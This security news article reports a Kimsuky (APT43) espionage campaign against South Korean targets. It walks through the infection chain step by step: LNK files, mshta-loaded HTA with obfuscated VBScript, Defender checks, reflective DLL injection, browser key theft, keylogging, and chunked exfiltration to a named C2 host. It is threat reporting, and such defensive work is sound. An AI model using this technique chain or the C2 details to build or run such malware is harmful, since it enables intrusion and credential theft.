Kimsuky APT Uses LNK Files to Deploy Reflective Malware and Evade Windows Defender

The North Korean state-sponsored group Kimsuky, also known as APT43, Thallium, and Velvet Chollima, has been accused of launching a recent cyber-espionage campaign in which the attackers used malicious Windows shortcut (LNK) files as the first point of entry to breach South Korean government agencies, defense contractors, and research institutions.

The operation begins with phishing emails containing ZIP archives that embed these LNK files, disguised as legitimate documents.

Upon execution, the LNK file invokes mshta.exe to load a remote HTML Application (HTA) file from a Content Delivery Network (CDN), which contains heavily obfuscated VBScript.

This script employs decimal and hexadecimal conversions via CLng and Chr functions to construct strings for URLs and commands, effectively bypassing static analysis and endpoint detection.

Sophisticated Infection Chain

According to the report, the malware then downloads a decoy PDF lure, such as repurposed South Korean government notices about sex offenders or tax penalties, to distract the victim while proceeding with payload deployment.

Simultaneously, it queries the status of Windows Defender using cmd /c sc query WinDefend. If Defender is active, the script downloads and decodes a ZIP archive containing Base64-encoded PowerShell scripts for information stealing and keylogging.

These scripts ensure one-time execution by storing the process ID in a UUID-based temporary file, perform anti-VM checks against manufacturers like VMware, Microsoft, and VirtualBox, and establish persistence via a registry run key under HKCUSoftwareMicrosoftWindowsCurrentVersionRun named WindowsSecurityCheck.

Data Exfiltration Tactics

When Windows Defender is disabled, the malware escalates by downloading an alternative HTA file that embeds Base64-encoded payloads, extracting and executing a reflective DLL loader without disk writes.

This loader decrypts encrypted files using RC4, injects them into memory via VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread, targeting the ReflectiveLoader export to evade file-based detection.

The injected payload steals app_bound_encrypted_key from Chromium-based browsers like Chrome, Edge, and Brave, facilitating offline decryption of credentials and cookies.

Throughout the campaign, the malware conducts victim profiling by compressing certificate directories (NPKI, GPKI), harvesting recent files from shortcut paths, extracting browser data including logins and extensions, and scanning drives for sensitive extensions like .docx, .pdf, and cryptocurrency-related terms.

Data is staged in a UUID-named folder under %TEMP%, compressed into init.zip (renamed to init.dat), and exfiltrated in 1MB chunks via HTTP POST to command-and-control (C2) servers such as ygbsbl.hopto.org, disguised as normal web traffic.

Keylogging captures keystrokes, clipboard changes, and window titles using GetAsyncKeyState and GetForegroundWindow APIs, logging to k.log for periodic upload.

The C2 loop, executed every 10 minutes, queries /rd for file uploads, /wr for downloads, and /cm for remote PowerShell commands via Invoke-Expression, enabling dynamic payload delivery and real-time control.

Attribution to Kimsuky is reinforced by consistent TTPs, including PowerShell abuse and South Korean-specific lures, aligning with prior reports from Seqrite and security researchers in early 2025.

This campaign underscores Kimsuky’s evolution in blending social engineering with modular malware, exploiting legitimate tools for stealth and persistence.

By mapping to MITRE ATT&CK techniques like T1204.002 (Malicious File Execution), T1059.005 (VBScript), T1218.005 (mshta), and T1620 (Reflective Code Loading), it highlights risks to politically sensitive sectors.

Organizations should implement behavioral monitoring, PowerShell auditing, and unified SASE platforms for anomaly detection to disrupt such threats.

Indicators of Compromise (IOCs)

Find this News Interesting! Follow us on Google News, LinkedIn, and X to Get Instant Updates!